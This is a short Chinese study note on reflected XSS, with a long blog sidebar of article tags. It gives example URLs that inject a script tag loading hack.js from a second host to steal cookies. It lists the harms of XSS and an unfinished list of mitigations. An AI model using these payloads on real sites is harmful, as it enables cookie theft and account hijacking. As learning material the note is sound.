@2890594972 2019-05-16T13:58:28.000000Z 字数 418 阅读 688

xss和xsrf攻击

xss

xss

反射型-url参数直接注入

//普通
http://localhost:3005/?from=china
//alert尝试
http://localhost:3005/?from=<script>alert(123)</script>
// 获取cookie
http://localhost:3005/?from=<script src="http://localhost:3006/hack.js"></script>
http://114.215.87.206:3005/?from=<script src="http://114.215.87.206:3006/hack.js"></script>

危害：XSS攻击的危害，Scripting能干啥就能干啥

获取页面数据
获取cookies
劫持前端逻辑
发送请求
偷取网站的任意数据
偷取用户的资料
偷取用户的密码和登录态
欺骗用户

预防:
1、转义字符
2、设置cookie为只读
3、

- - 1511 4
  - 面向对象重构购物车重构-02
  - 面向对象写购物车-重构
  - 人是怎么废掉的
  - 面向对象封装购物车
- - 1511c 15
  - 移动端UI组件框架
  - 手机页面组件说明
  - react之redux
  - react-router app抗
  - 管理平台
  - react笔记-小试牛刀
  - git团队协作
  - vue拦截重定向
  - 项目总结
  - vue单页面应用性能优化
  - 登录拦截逻辑
  - toast提示
  - 登录开发
  - 登录注册开发
  - 学习知识示范案例slice
- - 1602 3
  - 2018年8月4号面试题汇总总
  - 2018.8.3 一日5题
  - 2018年8月1号一日5题
- - CSS 1
  - 妙味课堂-CSS3
- - ES6 1
  - ES6 10.18
- - Fis3 1
  - FIS3 使用说明-大象课堂笔记-20171020
- - Git冲突 1
  - Git冲突问题
- - HGF 1
  - koa2 + element-ui 开发
- - MongoDB 1
  - MongoDB增删改查封装
- - OPTIONS 1
  - 浅谈 AJAX 跨域请求时的 OPTIONS 方法
- - PS 1
  - 02-ps钢笔工具怎么用以及使用技巧
- - Vue 1
  - Vue开发
- - angular课后考试 1
  - 第01单元-认识Ionic2
- - animate 1
  - css3 animate
- - api 1
  - 接口电商
- - apicloud 9
  - apicloud-学习-第十三讲 APICloud应用组成
  - apicloud-学习-入门基础初级代码篇第十二讲 APICloud配置文件简介
  - apicloud-学习06-使用自定义AppLoader调试第三方SDK模块
  - apicloud-05学习-APICloud前端框架
  - apicloud-学习05-APICloud应用结构分析
  - apicloud - 04学习-APIcloud 基础
  - apicloud-03学习-sublime 开发第一个APICloud应用（二）
  - apicloud-学习02-开发第一个APICloud应用（一）
  - apicloud-学习01
- - axios 1
  - 浅谈 AJAX 跨域请求时的 OPTIONS 方法
- - better-scroll 1
  - better-scroll
- - bower 1
  - bower 发布自己管理包
- - cordova 2
  - Create your first Cordova app
  - cordova将vue项目打包成app
- - demo 1
  - koa2+mysql demo
- - echart 5
  - echart组件
  - 如何使用echart
  - 第三课-echart的基础
  - echart特性-第二课
  - echart视频学习教程
- - element-ui 11
  - element ui导航和路由
  - element ui table合并
  - 帅选条件实现
  - element ui tabs定制效果
  - 栅格化定制
  - 接口电商
  - tabs效果
  - koa2 + element-ui 开发
  - element-ui Pagination 分页
  - element-ui组件样式修改
  - Element UI Table
- - es6 1
  - 新闻网react之es6
- - fis3 2
  - fis3 与 rem 实现移动端布局
  - Fis3相对路径文件
- - flex 1
  - CSS Flexbox 可视化手册
- - form 1
  - react 表单综合设计form
- - git 5
  - 代码写作基于Git和基于Svn
  - git用户信息配置
  - 常用 Git 命令清单
  - git checkout 使用
  - 码云集成vscode
- - http 1
  - http请求
- - https 1
  - https证书制作 node
- - iview 4
  - vue表单总结
  - vue iview表单
  - iview模板使用
  - iview table格式
- - jquery 1
  - 自动登录保存信息
- - jsx 1
  - JS JSX Snippets
- - jsx编译 1
  - react之jsx编译
- - less 1
  - fis3 与 rem 实现移动端布局
- - logo 2
  - logo2
  - logo初识
- - mock 1
  - mockjs for选好快捷
- - muse-ui 1
  - 国金投资 vue-cli3+muse-ui开发
- - node 1
  - https证书制作 node
- - note 1
  - note6
- - npmjs 1
  - ueditor npm组件化发布 npmjs
- - nrm 1
  - 自动化测试
- - php 11
  - tp5 学习计划和进度
  - tp5 sql三种操作方式
  - tp5 日志
  - tp5 导图
  - tp5 异常与全局自定义异常
  - tp5 参数校验器
  - tp5 Token
  - tp5 3-5 定义路由
  - tp5 路由简化
  - tp5 vscode php debug调试配置
  - tp5 编写接口
- - ps 4
  - 05-ps选区-截图-画笔-渐变
  - 04-PS-图层蒙版
  - 03-ps怎么新建图层及ps图层介绍
  - 03-PS通道怎么用-PS通道在哪儿
- - react 20
  - 笔记-向军-redux应用演示
  - webpack and react配置
  - reactjs精品课程
  - reactjs精品教程资料-day2
  - 02 | 以组件方式考虑UI的构建
  - 01 | React出现的历史背景及特性介绍
  - css模块化解决方案
  - react html在vsocde中快捷实现
  - react-router app抗
  - JS JSX Snippets
  - react笔记-小试牛刀
  - react redux
  - react react-router(二)
  - react fetch(三)
  - react快速入门(一)
  - react 子组件向父组件传递参数
  - react props
  - react状态机
  - react入门-jsx语法
  - react快速入门
- - react-router 1
  - react-router4
- - reactjs精品教程资料 2
  - reactjs精品教程资料-day2
  - reactjs精品教程资料-day1
- - reactjs精品教程资料-day3 1
  - reactjs精品教程资料-day3
- - react入门到精通 2
  - 02 | 以组件方式考虑UI的构建
  - 01 | React出现的历史背景及特性介绍
- - react教学 4
  - react redux
  - react react-router(二)
  - react fetch(三)
  - react快速入门(一)
- - redux 2
  - 笔记-向军-redux应用演示
  - react之redux
- - rem 1
  - fis3 与 rem 实现移动端布局
- - sina 1
  - sina云服务器nodejs
- - snippet 2
  - javascript snipeet
  - 开发属于自己的vscode-snippet插件
- - svn 3
  - 代码写作基于Git和基于Svn
  - SVN服务器测试服务器线上服务器
  - 关闭和重启svn
- - tabs 1
  - tabs效果
- - tp5 16
  - 浅谈 AJAX 跨域请求时的 OPTIONS 方法
  - iview模板使用
  - tp5 学习计划和进度
  - tp5 sql三种操作方式
  - tp5 日志
  - tp5 导图
  - tp5 异常与全局自定义异常
  - tp5 参数校验器
  - tp5 Token
  - tp5 3-5 定义路由
  - tp5 postman安装
  - tp5 路由简化
  - tp5 路径格式
  - tp5 vscode php debug调试配置
  - tp5 层次结构
  - tp5 编写接口
- - ueditor 1
  - ueditor npm组件化发布 npmjs
- - uniapp 1
  - uniapp 开发问题记录
- - vscode 4
  - css模块化解决方案
  - react html在vsocde中快捷实现
  - JS JSX Snippets
  - 开发属于自己的vscode-snippet插件
- - vue 15
  - vue表单总结
  - vue iview表单
  - iview模板使用
  - ueditor npm组件化发布 npmjs
  - <keep-alive>组件缓存问题
  - vue项目实现按需加载的3种方式
  - 实现组件懒加载
  - vue支持less\sass\stylus
  - vue-router 动态路由
  - 重点强化--使用vue-router
  - 重点强化--使用vue-resource
  - vue重点强化--使用vuex
  - vue全家桶与 vuex 知识
  - vue全家桶与vue-resource知识点 02
  - vue全家桶与vue-router 知识点01
- - vue-router 1
  - vue-router 动态路由
- - weex 2
  - weex安装
  - weex-vue
- - windows 1
  - 如何kill被占用的端口号
- - xiuno 1
  - 修罗开源系统
- - xss 1
  - xss和xsrf攻击
- - 一日5题 2
  - 2018.8.3 一日5题
  - 2018年8月1号一日5题
- - 专题系列 1
  - 四大专题
- - 串讲 1
  - 知识串讲2.0
- - 云服务器 1
  - sina云服务器nodejs
- - 修罗 1
  - 修罗开源系统
- - 前端开发规范要求 1
  - 前端开发规范要求
- - 千万级 1
  - 千万级项目状态架构
- - 大象 2
  - 码云集成vscode
  - Create your first Cordova app
- - 学习 1
  - 学习方法
- - 封装jquery 1
  - 封装jquery
- - 小程序 1
  - 微信小程序 openid
- - 工具 1
  - i5ting_toc产出文档
- - 异步 1
  - 图片异步上传
- - 性能优化 1
  - 性能优化
- - 战略管理 3
  - 企业战略目标
  - 战略管理-企业使命
  - 战略管理
- - 接口 1
  - 接口电商
- - 接口文档编写 1
  - 新iview-管理项目
- - 月考考试 1
  - 考试提前准备10.26
- - 服务器 2
  - SVN服务器测试服务器线上服务器
  - 项目发布上线到服务器
- - 浏览器缓存 1
  - 缓存
- - 知识体系构建 1
  - php之偷数据
- - 移动端 1
  - 移动端UI组件框架
- - 管理后台 1
  - react ant-design管理后台
- - 考试 1
  - 周考三-考试笔记
- - 考题系统 1
  - 考题管理-左侧菜单分析-大象
- - 自动化测试 1
  - 自动化测试
- - 自学设计之类 1
  - 03-ps怎么新建图层及ps图层介绍
- - 自学设计之路 5
  - 05-ps选区-截图-画笔-渐变
  - 04-PS-图层蒙版
  - 03-PS通道怎么用-PS通道在哪儿
  - 02-ps钢笔工具怎么用以及使用技巧
  - 01-PS-怎么抠图人像抠图的方法
- - 设计模式 1
  - GOF23设计模式
- - 说课平台 2
  - 说课平台需求
  - 说课平台需求
- - 路由 1
  - vue-router 动态路由
- - 软件 1
  - teamviewer破解版序列号
- - 达魔学院 1
  - 达魔学院首页-小程序
- - 防火墙 1
  - 关闭防火墙
- - 面向对象 3
  - 面向对象重构购物车重构-02
  - 面向对象写购物车-重构
  - 面向对象封装购物车
- - 面试 1
  - 面试
- - 面试真题 1
  - 面试题整理任务
- - 项目实战 1
  - 管理平台
- - 未分类 6
  - 如何搭建组件库
  - summarize
  - 模块化和组件化
  - 章节2课时5EC【图表】详解：直角系图表，（堆积）折线图，line
  - 干掉pdf.js相关功能
  - Markdown基础语法总结 Editor.md
- 以下【标签】将用于标记这篇文稿：

添加新批注

在作者公开此批注前，只有你和作者可见。

私有
公开
删除

回复批注

xss和xsrf攻击

xss

内容目录